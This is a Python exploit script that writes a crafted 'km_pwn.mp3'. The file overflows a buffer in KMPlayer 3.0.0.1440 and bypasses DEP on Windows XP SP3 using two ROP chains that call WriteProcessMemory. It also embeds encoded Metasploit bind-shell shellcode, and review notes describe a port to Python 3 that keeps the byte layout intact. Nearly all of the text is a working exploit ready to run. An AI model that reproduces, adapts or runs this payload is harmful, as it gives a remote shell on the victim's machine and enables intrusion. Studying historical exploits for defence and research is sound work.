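#!/usr/bin/python
#
# The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
#
# Downloaded from: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html
#
# 06 Jun 11
#
# Cobbled together by dookie and ronin
#
# This exploit performs DEP bypass on WinXP SP3 with 2 different offsets.
# In our testing environments, there were 2 separate offsets. One offset
# applies to VMs running on Xen and VMware workstation for Linux. The
# second offset applies to ESXi and VMware Fusion.
#
# Review notes on this revision:
#   * Every buffer is a bytes literal and the output file is opened in
#     binary mode.  The original built str objects and wrote them with
#     open(..., "w"): on Python 3 that encodes every byte >= 0x80 as two
#     UTF-8 bytes, and on Windows text mode rewrites 0x0A as 0x0D 0x0A.
#     Either silently shifts every offset in the ROP layout.  The bytes
#     produced here are identical to what the Python 2 original emitted
#     on Linux.
#   * The file is only written when the script is run directly, so the
#     module can be imported to inspect the layout without dropping
#     km_pwn.mp3 into the working directory.
#   * Every gadget and API address is hard-coded for XP SP3 and the
#     specific KMPlayer plugin DLL builds named in the comments.  They do
#     not transfer to other builds, other locales, or ASLR-enabled systems.
import os

evilfile = "km_pwn.mp3"

# Opaque header taken from the crashing test case.  It looks like a mutated
# ID3v2 tag (frame ids such as "TIT2", "TCON" and "PRIV" are visible in the
# bytes) but it is not reconstructed here: the overflow offset is
# len(head) + len(cruft), so this sequence must stay byte-for-byte as found.
head = (
    b"\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00"
    b"\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68"
    b"\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00"
    b"\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54"
    b"\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D"
    b"\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45"
    b"\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E"
    b"\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C"
    b"\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67"
    b"\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C"
    b"\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08"
    b"\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99"
    b"\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73"
    b"\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49"
    b"\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43"
    b"\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51"
    b"\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52"
    b"\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69"
    b"\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56"
    b"\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65"
    b"\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6"
    b"\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2"
    b"\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44"
    b"\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2"
    b"\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D"
    b"\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49"
    b"\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06"
    b"\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE"
    b"\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D"
    b"\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74"
    b"\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00"
    b"\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00"
    b"\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00"
    b"\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00"
    b"\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00"
    b"\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00"
    b"\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00"
    b"\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12"
    b"\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68"
    b"\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB"
    b"\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76"
    b"\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65"
    b"\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65"
    b"\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20"
    b"\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00"
    # Trailing tag padding, copied verbatim (long runs of zero bytes).
    b"\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"
)

# Filler between the header and the overwritten return address.
cruft = b"\x85" * 3162

# NOP sled in front of the first shellcode copy.  The 0x91 is deliberate:
# according to the original authors one of the "DEC DWORD PTR DS:[EAX]"
# gadgets in rop2 lands on this dword while EAX is being walked up to the
# shellcode, turning 0x90909091 back into 0x90909090.
nops = b"\x90" * 28
nops += b"\x91\x90\x90\x90"  # The last byte gets decremented in rop2 while pointing EAX at the shellcode
nops += b"\x90" * 20

# shellcode = b"\xcc" * 368  # Size of bind shell
# root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
# Bind shell: listens on the default msfpayload port.  368 bytes; both
# ROP chains copy 0x200 bytes, so the sled/filler after it must be at
# least 0x200 - 368 bytes long.
shellcode = (
    b"\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
    b"\x56\x31\x68\x13\x83\xc0\x04\x03\x68\xc0\x3a\x89\x2c\x36\x33"
    b"\x72\xcd\xc6\x24\xfa\x28\xf7\x76\x98\x39\xa5\x46\xea\x6c\x45"
    b"\x2c\xbe\x84\xde\x40\x17\xaa\x57\xee\x41\x85\x68\xde\x4d\x49"
    b"\xaa\x40\x32\x90\xfe\xa2\x0b\x5b\xf3\xa3\x4c\x86\xfb\xf6\x05"
    b"\xcc\xa9\xe6\x22\x90\x71\x06\xe5\x9e\xc9\x70\x80\x61\xbd\xca"
    b"\x8b\xb1\x6d\x40\xc3\x29\x06\x0e\xf4\x48\xcb\x4c\xc8\x03\x60"
    b"\xa6\xba\x95\xa0\xf6\x43\xa4\x8c\x55\x7a\x08\x01\xa7\xba\xaf"
    b"\xf9\xd2\xb0\xd3\x84\xe4\x02\xa9\x52\x60\x97\x09\x11\xd2\x73"
    b"\xab\xf6\x85\xf0\xa7\xb3\xc2\x5f\xa4\x42\x06\xd4\xd0\xcf\xa9"
    b"\x3b\x51\x8b\x8d\x9f\x39\x48\xaf\x86\xe7\x3f\xd0\xd9\x40\xe0"
    b"\x74\x91\x63\xf5\x0f\xf8\xeb\x3a\x22\x03\xec\x54\x35\x70\xde"
    b"\xfb\xed\x1e\x52\x74\x28\xd8\x95\xaf\x8c\x76\x68\x4f\xed\x5f"
    b"\xaf\x1b\xbd\xf7\x06\x23\x56\x08\xa6\xf6\xf9\x58\x08\xa8\xb9"
    b"\x08\xe8\x18\x52\x43\xe7\x47\x42\x6c\x2d\xfe\x44\xa2\x15\x53"
    b"\x23\xc7\xa9\x42\xef\x4e\x4f\x0e\x1f\x07\xc7\xa6\xdd\x7c\xd0"
    b"\x51\x1d\x57\x4c\xca\x89\xef\x9a\xcc\xb6\xef\x88\x7f\x1a\x47"
    b"\x5b\x0b\x70\x5c\x7a\x0c\x5d\xf4\xf5\x35\x36\x8e\x6b\xf4\xa6"
    b"\x8f\xa1\x6e\x4a\x1d\x2e\x6e\x05\x3e\xf9\x39\x42\xf0\xf0\xaf"
    b"\x7e\xab\xaa\xcd\x82\x2d\x94\x55\x59\x8e\x1b\x54\x2c\xaa\x3f"
    b"\x46\xe8\x33\x04\x32\xa4\x65\xd2\xec\x02\xdc\x94\x46\xdd\xb3"
    b"\x7e\x0e\x98\xff\x40\x48\xa5\xd5\x36\xb4\x14\x80\x0e\xcb\x99"
    b"\x44\x87\xb4\xc7\xf4\x68\x6f\x4c\x04\x23\x2d\xe5\x8d\xea\xa4"
    b"\xb7\xd3\x0c\x13\xfb\xed\x8e\x91\x84\x09\x8e\xd0\x81\x56\x08"
    b"\x09\xf8\xc7\xfd\x2d\xaf\xe8\xd7"
)

##################### ROP Chain for VMware Workstation (Linux) and Xen #####################
# Technique (both chains): call WriteProcessMemory on the current process to
# copy the shellcode over a code page that is already executable, then return
# into it.  The lpBuffer and nSize arguments are not known at build time, so
# they are left as placeholders in the stack frame and written by gadgets.

eip = b"\x71\x14\x40\x00"  # 00401471 RETN - Pivot to the stack
toesp = b"\x42" * 4

# WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten)
wpm = b"".join((
    b"\x13\x22\x80\x7c",  # 7C802213 WriteProcessMemory - XPSP3
    b"\x20\x1f\x45\x02",  # 02451F20 in_wm.dll - Return after WPM
    b"\xff\xff\xff\xff",  # hProcess: (HANDLE)-1, the current-process pseudo handle
    b"\x10\x1f\x45\x02",  # 02451F10 in_wm.dll - lpBaseAddress (address to patch)
    b"\xbe\xba\xfe\xca",  # lpBuffer placeholder (shellcode address) - written by rop2
    b"\xce\xfa\xed\xfe",  # nSize placeholder (shellcode size) - written by rop2
    b"\xc0\x2b\x45\x02",  # 02452BC0 in_wm.dll - lpNumberOfBytesWritten (writable dword)
))

# Get a copy of ESP into a register
rop1 = b"\x4f\x92\x71\x13"  # 1371924F :{POP}# PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll)
rop1 += b"\x41" * 12        # Junk to be popped into ESI, EBP, and EBX

# Junk between the WriteProcessMemory frame and the next ROP chain
# (the "ADD ESP,50" in rop1 skips over it).
junk = b"\x61" * 52

rop2 = b"".join((
    # Put a copy of the saved ESP from EDI into EAX
    b"\x75\x66\x8a\x5b",  # 5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)
    b"\x41" * 8,          # Compensate for the RETN 8 in rop1
    # Increase EAX to point at our shellcode
    b"\x37\x75\x37\x02",  # 02377537 :# ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
    b"\x37\x75\x37\x02",  # 02377537 :# ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
    # Write the address of the shellcode into the lpBuffer placeholder.
    # First park EAX in EDX, then move the saved ESP (EDI) into ESI so the
    # MOV [ESI+1C] gadget writes relative to the start of the WPM frame.
    b"\xc3\x87\xec\x76",  # 76EC87C3 :# XCHG EAX,EDX # RETN (TAPI32.dll)
    b"\x75\x66\x8a\x5b",  # 5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)
    b"\xd8\xc3\x3c\x76",  # 763CC3D8 :# XCHG EAX,ESI # RETN (comdlg32.dll)
    b"\xc3\x87\xec\x76",  # 76EC87C3 :# XCHG EAX,EDX # RETN (TAPI32.dll)
    b"\xbe\x9c\xca\x76",  # 76CA9CBE :# MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)
    b"\x41" * 4,          # Junk to be popped into ESI
    # Get the initial ESP value back into ESI
    b"\xe6\x57\x01\x15",  # 150157E6 :{POP}# DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll)
    b"\x41" * 8,          # Junk to be popped into EBX and ECX
    b"\xd8\xc3\x3c\x76",  # 763CC3D8 :# XCHG EAX,ESI # RETN (comdlg32.dll)
    # Zero EAX and set it to the shellcode size (0x200)
    b"\xc0\x11\x37\x02",  # 023711C0 :# XOR EAX,EAX # RETN (in_mp4.dll)
    b"\xe9\x0b\x44\x02",  # 02440BE9 :# ADD EAX,100 # POP EBP # RETN (in_wm.dll)
    b"\x41" * 4,          # Junk to be popped into EBP
    b"\xe9\x0b\x44\x02",  # 02440BE9 :# ADD EAX,100 # POP EBP # RETN (in_wm.dll)
    b"\x41" * 4,          # Junk to be popped into EBP
    # Write the shellcode size into the nSize placeholder
    b"\x3f\xcf\x9e\x7c",  # 7C9ECF3F :{POP}# MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll)
    b"\x41" * 8,          # Junk to be popped into ESI and EBP
    # Point EAX at the WPM setup on the stack, then PUSH EAX / POP ESP into it
    b"\x41\x15\x5d\x77",  # 775D1541 :# SUB EAX,4 # RETN (ole32.dll)
    b"\x41" * 4,          # Compensate for the RETN 4 above
    b"\x51\xeb\x43\x02",  # 0243EB51 :# ADD EAX,0C # RETN (in_wm.dll)
    b"\xce\x05\x42\x02",  # 024205CE :{POP}# PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll)
    b"\x41" * 4,          # Junk to be popped into ESI
    b"\x41" * 32,
))

############################# ROP Chain for VMware Fusion and ESXi ############################

###############################################################################################
## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction
###############################################################################################
# Loaded into ESI and subtracted from ESP to land in the big buffer.
# NOTE(review): the original comment says "14830 = 39ee" but the constant
# actually used is 0x38F0 (14576).  The constant is what was tested against;
# it is kept unchanged and the comment discrepancy is only recorded here.
jmp_value = b"\xf0\x38\x00\x00"

rop_1 = b"".join((
    b"\x46" * 4,
    b"\x2c\x80\x44\x77",  # 0x7744802C :# INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)**
    b"\x75\x66\x8a\x5b",  # 0x5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)**
    b"\x21\x60\x92\x7c",  # 0x7C926021 :{POP}# SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll)**
    b"\x50" * 8,          # Junk to be popped into ESI and EBP
    b"\x09\x15\x45\x7e",  # 0x7E451509 :# XCHG EAX,ESP # RETN (USER32.dll)**
))

###############################################################################################
filler_a1 = b"\x41" * 360

###############################################################################################
## ROP_2 = all about the shell
###############################################################################################
rop_2 = b"".join((
    ######### SAVING STACKPOINTERS ############################################################
    b"\x2c\x80\x44\x77",  # 0x7744802C :# INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)**
    b"\x75\x66\x8a\x5b",  # 0x5B8A6675 :# PUSH EDI # POP EAX # RETN (NETAPI32.dll)**
    b"\x1e\x9f\x8a\x5b",  # 0x5B8A9F1E :# ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll)**
    b"\x43\x43\x43\x43",
    # WriteProcessMemory frame with the two placeholders generated on the fly
    b"\x13\x22\x80\x7c",  # WriteProcMem - XPSP3
    b"\x00\x2e\x98\x7c",  # ntdll - patching target (return address after WPM)
    b"\xff\xff\xff\xff",  # hProcess: (HANDLE)-1, the current-process pseudo handle
    b"\x00\x2e\x98\x7c",  # ntdll - patching target (lpBaseAddress)
    b"\xbe\xba\xfe\xca",  # lpBuffer placeholder (shellcode address)
    b"\xce\xfa\xed\xfe",  # nSize placeholder (shellcode size)
    # lpNumberOfBytesWritten: writable location in ntdll.  The original
    # spelled this "\10\x20\x98\x7c"; "\10" is an OCTAL escape (0x08), so the
    # address that was actually tested is 0x7C982008, not 0x7C982010.  The
    # byte is written explicitly here to preserve that exact value.
    b"\x08\x20\x98\x7c",
    ######### FIRST PARAM - lpBuffer placeholder (Shellcode Address) ##########################
    # Gadgets (plus padding) that compute the address of the shellcode, store
    # it into the placeholder and restore EAX.
    b"\x44" * 40,
    b"\x8e\x4e\x97\x7c",  # 0x7C974E8E :# ADD EAX,100 # POP EBP # RETN (ntdll.dll)**
    b"\x44" * 32,
    b"\x8e\x4e\x97\x7c",
    b"\x44" * 4,
    b"\x8d\xda\x45\x7e",  # 0x7E45DA8D :# XCHG EAX,EBP # RETN (USER32.dll)**
    b"\x4e\x99\xdd\x77",  # 0x77DD994E :# XCHG EAX,EDI # RETN 2 (ADVAPI32.dll)**
    b"\x66\x0c\x91\x7c",  # 0x7C910C66 :# XCHG EAX,ESI # RETN 2 (ntdll.dll)**
    b"\x44" * 2,          # padding for the RETN 2
    b"\x8d\xda\x45\x7e",  # 0x7E45DA8D :# XCHG EAX,EBP # RETN (USER32.dll)**
    b"\x44" * 2,          # padding for the RETN 2
    b"\xbe\x9c\xca\x76",  # 0x76CA9CBE :# MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)**
    ######### SIZE PARAM - nSize placeholder (Shellcode Size) #################################
    # Gadgets (plus padding) that build the size value (0x200 bytes), store it
    # into the placeholder and restore EAX.
    b"\x47" * 4,
    b"\x6e\x15\x5d\x77",  # 0x775D156E :# PUSH EAX # POP ESI # RETN (ole32.dll)**
    b"\x85\x37\x43\x7e",  # 0x7E433785 :# XOR EAX,EAX # RETN 4 (USER32.dll)**
    b"\x8e\x4e\x97\x7c",  # 0x7C974E8E :# ADD EAX,100 # POP EBP # RETN (ntdll.dll)**
    b"\x45" * 8,
    b"\x8e\x4e\x97\x7c",
    b"\x45" * 4,
    b"\x2e\xaa\xd0\x75",  # 0x75D0AA2E :# MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN (mlang.dll)**
    ######### Realigning EAX to point to WPM and setting ESP to it ############################
    b"\x50" * 4,
    b"\x18\xf1\xca\x76",  # 0x76CAF118 :# ADD EAX,0C # RETN (IMAGEHLP.dll)**
    b"\x09\x15\x45\x7e",  # 0x7E451509 :# XCHG EAX,ESP # RETN (USER32.dll)**
    b"\x43" * 316,
))

###############################################################################################
##################### VARIOUS PADDINGS AND OTHER NONSENSE #####################################
# slide into the shell
nops_7 = b"\x90" * 56
# after the shell
filler_a2 = b"\x42" * 3200

###############################################################################################
############################# PUTTING IT TOGETHER #############################################
filler_a = filler_a1 + rop_2 + nops_7 + shellcode + filler_a2
# small buffer filler
filler_b = b"\x44" * 95
# the whole shebang (ronin's version)
filler = filler_a + jmp_value + eip + rop_1 + filler_b

###############################################################################################
# Final layout: [head][cruft][eip][toesp][rop1][wpm][junk][rop2][nops][shellcode]
#               [Fusion/ESXi chain: filler_a, jmp_value, eip, rop_1, filler_b]
# Which chain fires depends on the offset the target hits (see the header).
sploit = head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops + shellcode + filler


def write_payload(path, data):
    """Write the crafted file.

    Args:
        path: Destination file name (the original writes ``km_pwn.mp3`` in
            the current directory).
        data: Payload bytes.  Written in binary mode so no newline or
            encoding translation can alter the ROP offsets.

    Returns:
        The number of bytes written.
    """
    with open(path, "wb") as out:
        return out.write(data)


if __name__ == "__main__":
    write_payload(evilfile, sploit)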